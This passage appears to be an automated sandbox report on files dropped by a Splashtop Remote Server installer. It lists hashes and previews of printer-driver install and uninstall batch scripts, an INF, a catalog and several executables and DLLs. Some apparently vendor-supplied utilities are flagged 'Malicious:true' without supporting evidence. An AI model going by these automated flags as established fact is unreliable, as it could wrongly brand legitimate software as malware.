                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):879
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190136582088596
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:k8rGqwAcK/EyAZRVowyyAcK/E2kam0LYDfyegidym0EZkBqq6JFpYpFSqq6JFrm7:XrWWFwD7WR8fCI/xOZE
                                                                                                                                                                                                                                                                                                                                  MD5:0A0EE03D0C51915B2815280B476530F4
                                                                                                                                                                                                                                                                                                                                  SHA1:6C074D8E0D462B6E6D0CC5C02BABB88D483E3551
                                                                                                                                                                                                                                                                                                                                  SHA-256:C3FB7578267FA09C4446C926532FD869DD8E74CD20AF2915BBEE32DB4D647C9D
                                                                                                                                                                                                                                                                                                                                  SHA-512:85EC5D2898892F847618D7A10D7DD680839A3D0E55603D56C5C39568E8D7B0F63F7A10BF4B063611B9ECD395BD73B89010B421ADD481CDBEF0A50B3770A9C9F8
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\PrnPort.exe /a >> inst.log..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. reg add "HKLM\SOFTWARE\Wow6432Node\Splashtop Inc.\Splashtop Remote Server" /f /v "PrinterINFa" /t REG_SZ /d "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log.. IF NOT EXIST "%ProgramData%\Splashtop" mkdir "%ProgramData%\Splashtop".. IF NOT EXIST "%ProgramData%\Splashtop\Temp" mkdir "%ProgramData%\Splashtop\Temp".. ECHO Found "%WINDIR%\System32\DriverStore\FileRepository\%%a\stprinter.inf" >> inst.log..)..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\p_mount.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.631936044721133
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Hjsm6y9jcK/ES2d6y9jcKZS2bVXzLYwkrnRS2n:DWAcK/EyAcKZRVowyh
                                                                                                                                                                                                                                                                                                                                  MD5:88E59700F53DE95D2847B9687764BE30
                                                                                                                                                                                                                                                                                                                                  SHA1:CD5780DBF1C711B9C28DC001F4149BA3251BECF7
                                                                                                                                                                                                                                                                                                                                  SHA-256:B085F4E0D6A7A4DC967C96D7C318CB749BC497135FD9E35D7AD0C88E6C53F577
                                                                                                                                                                                                                                                                                                                                  SHA-512:6E7D2FD4CF87B63BAB39E225362ECBE60F52FAB0DA42C97834B8EA59D653CDBD06B98E2C490C5465B1999AF2F7869F729CBFC34E55D5ECC768D85D48B9874374
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:cd %~dp0..rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..rundll32 printui.dll,PrintUIEntry /q /if /b "Splashtop Remote Printer" /f stprinter.inf /r "StPrinter" /m "Splashtop Remote Printer"

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\p_unmount.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.068283784998216
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:mKDDQFGCTWYdym6F9K2MLgZ+X0KcK/F+N7oaf/DEd7/JQF9K2MLgZ+X0KcK/FvK2:hsICTJ6y9jcK/ePD0Sy9jcK/ES2uz
                                                                                                                                                                                                                                                                                                                                  MD5:FA3C191799254E542687F1F5D0974BC5
                                                                                                                                                                                                                                                                                                                                  SHA1:DC85AAC2AA31CD3DE9017E7E099581457AD4FBF2
                                                                                                                                                                                                                                                                                                                                  SHA-256:347B12E6E2FC79E2A3668625341D7642D531159FFE5B01AB2BC5469E0EFC6B3F
                                                                                                                                                                                                                                                                                                                                  SHA-512:635689814E63084910541BA68FE8ADE8FDFBC3D0100AFD61DDD13D07E61F3478BA75E4D24AA7B26DF21A3E46C4ED2B1C8789520C5634CAC63CFE32DCB1E8686E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:@echo off....IF [%1] == [] GOTO RunDefault....rundll32 printui.dll,PrintUIEntry /q /dl /n %1..GOTO :EOF....:RunDefault...rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"...GOTO :EOF

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\stprinter.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17908
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.33935778048778
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:fNDJbjaXGStblM2wk0mev6/9IDRfupdYpJIBbIgx+4lMrp2/CsECw8nYe+PjPVhc:n3dw75xa1Sw8nYPLVhtOUez
                                                                                                                                                                                                                                                                                                                                  MD5:2DAC6568B843EBDC5C98598CA32918BE
                                                                                                                                                                                                                                                                                                                                  SHA1:E7740E4BE7F71A82ADBB6E5224D33534E237614C
                                                                                                                                                                                                                                                                                                                                  SHA-256:EB61A0E06BF8C69597F9BB1909E3EB4F926E49800C3F9721FDA3007993DA5EE7
                                                                                                                                                                                                                                                                                                                                  SHA-512:1BC8AA82E68911F5EE1835D19CF49A736C1C35C2F6B4FCD48C3C6FCF7FF6958400D1E815C5E891E172AF9035232175BB00E8A21F5A0590F02DC683F45A6C3D8B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.E...*.H........E.0.E....1.0...`.H.e......0.)...+.....7....(.0.(.0...+.....7....."@..g.O........190419043016Z0...+.....7.....0.(*0....R0.7.B.D.E.B.D.2.1.F.7.7.9.4.E.8.9.E.A.B.D.7.8.5.2.7.7.0.F.9.C.3.C.7.E.4.2.5.0.6...1..Q08..+.....7...1*0(...F.i.l.e........x.d.b.o.o.k...d.l.l...0M..+.....7...1?0=0...+.....7...0...........0!0...+.............w...'p....%.0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R0.9.2.2.5.D.8.6.A.4.8.9.4.8.1.5.2.D.E.3.A.F.3.4.6.4.9.1.B.8.9.3.5.7.9.2.5.3.C.A...1..G06..+.....7...1(0&...F.i.l.e........x.d.n.u.p...g.p.d...0E..+.....7...17050...+.....7.......0!0...+........."]...H.-.4d...W.S.0b..+.....7...1T0R...O.S.A.t.t.r.......<2.:.5...1.,.2.:.5...2.,.2.:.6...0.,.2.:.6...1.,.2.:.6...2...0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R1.3.F.C.5.E.A

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\stprinter.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2793
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.507689832444162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:JQUio6uDhMM/s4244P8/CW2T8/C0kApvgJCrC1sJCr+6pqEsXncT9tuhcOYEZ53t:JQUiRKhMostT9Ap4sr4ssraXx
                                                                                                                                                                                                                                                                                                                                  MD5:313535621266212971E303AF0AF4FE21
                                                                                                                                                                                                                                                                                                                                  SHA1:D81F9D3F7B638DE5EFCA0ECB0162A76485E2C2BF
                                                                                                                                                                                                                                                                                                                                  SHA-256:0B60A283CB98034CEE13118BF1F885A644479CC6F4B19D9E4D24A5FEC6064A1F
                                                                                                                                                                                                                                                                                                                                  SHA-512:8A1A716A2CAD85410F009EE0CDF570F4CA36E3A182927CA5B836F3FC0BEE466F0C4E8B583694A6A4014CE60C45A2439119BF0C1ADDA0ED168053E9F08A6DF608
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$Windows NT$"..Provider=%splashtop%..ClassGUID={4D36E979-E325-11CE-BFC1-08002BE10318}..Class=Printer..DriverVer=04/19/2019,10.0.10012.16386..CatalogFile=stprinter.cat....[Manufacturer]..%splashtop%=Vendor,NTx86,NTamd64,NTx86.6.0,NTamd64.6.0....[Vendor.NTx86]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTamd64]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_PRE_VISTA....[Vendor.NTx86.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[Vendor.NTamd64.6.0]..%splashtop.DeviceDesc% = INSTALL_XDSMPL_FILTERS_VISTA....[INSTALL_XDSMPL_FILTERS_PRE_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..PrintProcessor="MS_XPS,filterpipelineprintproc.dll"..ConfigFile=UniDrvUI.dll..HelpFile=UniDrv.HLP..DataFile=XDSmpl.GPD..Include=NTPRINT.INF, MSXPSDRV.INF..Needs=UNIDRV.OEM, XPSGPD.OEM, XPSDRV.OEM....[INSTALL_XDSMPL_FILTERS_VISTA]..CopyFiles=XPSDrvSample,ConfigPlugin,COLORPROFILES..DriverFile=mxdwdrv.dll..Confi

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2543
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.42985763446162
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWaDqFNQ29ZNlV2MK712DJNzaMR1X2kKJzgSZwlQXV2MK71euV2MKc:QFQ4ShC66ZLq7UAq7zq7o
                                                                                                                                                                                                                                                                                                                                  MD5:C228BF417378FD98E4229A2BA3054CAE
                                                                                                                                                                                                                                                                                                                                  SHA1:175CCDA93EF8EDBFAB2F1BE507F64690FE5BECE9
                                                                                                                                                                                                                                                                                                                                  SHA-256:1DFD5E0AD2765E39A614EF56603A749C095DDC00E6F50079CDDDA8E18159E73B
                                                                                                                                                                                                                                                                                                                                  SHA-512:6F9D65AA46B702E55D34532A37B33993AD53AB305679768F419A74B8CE2EF8C494CC877606C3C663545111F1189CE4456798D465C1A5EB4F7B6708DEB2A6B719
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..utils\DIFxCmd.exe /u stprinter.inf >> inst.log..utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows NT x86\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\w32x86\3\xdbook.dll"..del /F /Q "%

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2513
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.408021383480619
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:2uMRFNu4TMlWkDqFNQ4ZNlV2MK71AynXV2MK71euV2MK7153w3uV:QFQ4SDC64ZLq7xq7zq7Z
                                                                                                                                                                                                                                                                                                                                  MD5:DB05A3CA2E7604DC2E29A922A4545075
                                                                                                                                                                                                                                                                                                                                  SHA1:0430C36BD56EAC3F65E0060CE91DC60E31F822C5
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E0BD257BFE859F462EEE9E0F1DC20768425F73C9E90B0F7F5EE450726FBB56F
                                                                                                                                                                                                                                                                                                                                  SHA-512:9FDD486F4F7F5D1ED3CBEF4A2246416F88643E27E76D79A433E5450D8790BA264C3219555A0CB57602BC2E3F884C1E1449EA0688D59355D68E23DBE9499F8B60
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..ECHO -- uninstall start >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found Backup [%%a] >> inst.log.. SET STPRINTERREGBAK=%STPRINTERREGBAK% %%a..)....rundll32 printui.dll,PrintUIEntry /q /dl /n "Splashtop Remote Printer"..utils\DIFxCmd64.exe /u stprinter.inf >> inst.log..utils\PrnPort.exe /d >> inst.log....for /f "tokens=*" %%a in ( 'DIR "%WINDIR%\System32\DriverStore\FileRepository\stprint*" /B /ON /AD' ) do (.. ECHO Found [%%a] >> inst.log.. ::Remove cab.. del /F /Q "%WINDIR%\System32\spool\drivers\x64\PCC\%%a.cab" >> inst.log.. ::Remove inf.. del /S /F /Q "%WINDIR%\System32\DriverStore\FileRepository\%%a" >> inst.log.. ::Remove reg.. reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\PackageInstallation\Windows x64\DriverPackages\%%a" /f >> inst.log..)....::Remove all files..del /F /Q "%WINDIR%\System32\spool\drivers\x64\3\xdbook.dll"..del /F /Q "%WINDIR%

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\DIFxCmd.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Jp.....V...V...V.ivV...V.igV...V.iaV...V...V&..V.iqV...V.icV...VRich...V........PE..L....zZP.............................#.......0...............................P............@...... ..........................d(..P............................@..l.......................................@............................................text............................... ..`.data...x....0......."..............@....reloc.......@.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\DIFxCmd64.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................................................................Rich....................PE..d....vZP.........."...... ..........(%.......................................`.......`....@.......... ......................................4+..P............@...............P......p...................................................8............................text............ .................. ..`.data........0.......$..............@....pdata.......@.......&..............@..@.reloc..8....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\PrnPort.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):7680
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202360830491015
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:6HbQ34Dthj/wKzGMdCprD4iZ7F+gUABoTndoIvJJGtVAm6XyC7tCEqqb:6Hs4thgNDZ7F+gvqdHvJJ4VR6XPnb
                                                                                                                                                                                                                                                                                                                                  MD5:B6CA717203EF9E8DD1205CAC5D3AF38F
                                                                                                                                                                                                                                                                                                                                  SHA1:818438149A92551042A5D2ABD9000DBE67D93C67
                                                                                                                                                                                                                                                                                                                                  SHA-256:66986A04FDEF120D7F18351648A8737979DFAA3CA82F6504B3EA14F45BEC130C
                                                                                                                                                                                                                                                                                                                                  SHA-512:99D21F55B7E754A2D6063BE9302874D757344893CB496F574C2DB7F124071C361894508BADF7137B17A572EF9792F7E3B3C21292250D76CD33B9863D52A300D6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..|..|..|..u.!.}..u.7.i..u.0.~..u.'.{..|..W..u.>.~..u.%.}..Rich|..................PE..L.....8R..................................... ....@..........................`......q.....@.................................."..P....@.......................P..T.... ...............................!..@............ ...............................text...>........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\XDColMan.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):216416
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5890891928333435
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:8JzsVxRROApObap+CPSxzqNJ3pvfsFMV2+/SRVxy8iK:8EOb5x2NxqFMaP
                                                                                                                                                                                                                                                                                                                                  MD5:D57E38A511B607A79307F6966D5F862A
                                                                                                                                                                                                                                                                                                                                  SHA1:7F66DC176D9BDE0715A9050CAD9BA91785F7B192
                                                                                                                                                                                                                                                                                                                                  SHA-256:EF3A7B03F011CBAD96F503BF12BD151B97BAE1EACC700A7F352D175CCFDDB969
                                                                                                                                                                                                                                                                                                                                  SHA-512:72DF85067747090A20441F052796F5BCED00B4F8268568F14646A0C5A0CCD27DC87C9AFEEC689178F885CEDEE0636D61F238F36348F66E7D2EE940D09130C2C1
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x...<..<..<..5.5.3..<.....5.3.*..5.%.B..5.4.=..5.".k..5.2.=..5.7.=..Rich<..................PE..L....N.\...........!.........v......8........................................P......R.....@.........................@...}...\...........................`A... ......@................................T..@............................................text............................... ..`.data....>..........................@....rsrc...............................@..@.reloc.../... ...0..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\stprintmon.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):214992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.578816818366091
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:1yYZVBVmekQ5ncHc43wAmaxEJg3tNqYU51pQ8DfqXF7q9B24CvJ6BAQ:1y8Vf1uTHNqYUH+8GeMvJ4t
                                                                                                                                                                                                                                                                                                                                  MD5:DDBCBCED9CCBA27D296B680D04178B1D
                                                                                                                                                                                                                                                                                                                                  SHA1:5BE1EF49678E4F9250B675DFE595DF1219DD7EF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:B23B42E24EAB4E2F1DD94711EEC741F94D39F5EBAF238820A0B9D464522C24D2
                                                                                                                                                                                                                                                                                                                                  SHA-512:B913058A50A4235925F208E9FA8740DDA1A070168285401FD9C9032C0CC782887F5D92A0D68796D7473E61EE8DDC1E863503C288CAD1F99C233A0DEDE37CB314
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......mX.])9r.)9r.)9r.oh...9r.oh..<9r.oh...9r. A..&9r.)9s.G9r.$k...9r.$k..(9r.$k..(9r.)9..(9r.$k..(9r.Rich)9r.........................PE..L...-..Z...........!................(C...............................................:....@.............................Y............P...............0.......`..........8...........................8...@............................................text...p........................... ..`.rdata...e.......f..................@..@.data....4..........................@....rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdbook.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):156512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.590357914627137
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:Wooboos//G/jWDiNza6LR07qZ2bzl409+E/PXwCSp6WKsAqHew+1l7nkrZg8iE:WooyFiJRmbzl4mZYYqHz+1l7ki8iE
                                                                                                                                                                                                                                                                                                                                  MD5:C892519FE8AE2163C1368579EEC134F3
                                                                                                                                                                                                                                                                                                                                  SHA1:D5C75AABEDAD20373E7CA40CAF5C986C850974BE
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8C8B0F1DB2CEA6FAB3EEE350143BC677DA3A1E4B246325852B8A0B94A4A77D4
                                                                                                                                                                                                                                                                                                                                  SHA-512:7A2C0C78237E8528AD691D2F7377D33FFCCA06925359CAD0B787DF919A81EDDCB9296F1EE446BDE83CECF3520A070E72BE7956838BD1337987B422127121E093
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V..V..V..._..V..V..V...Y..V...O..V...^..V...H..V...X..V...]..V.Rich.V.........................PE..L....N.\...........!.........`.......q.......................................p......(.....@.............................{.......x....0..............."..`A...@......................................P>..@............................................text...;........................... ..`.data...@2..........................@....rsrc........0......................@..@.reloc..D$...@...&..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdnup.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):169312
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.584431984131001
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
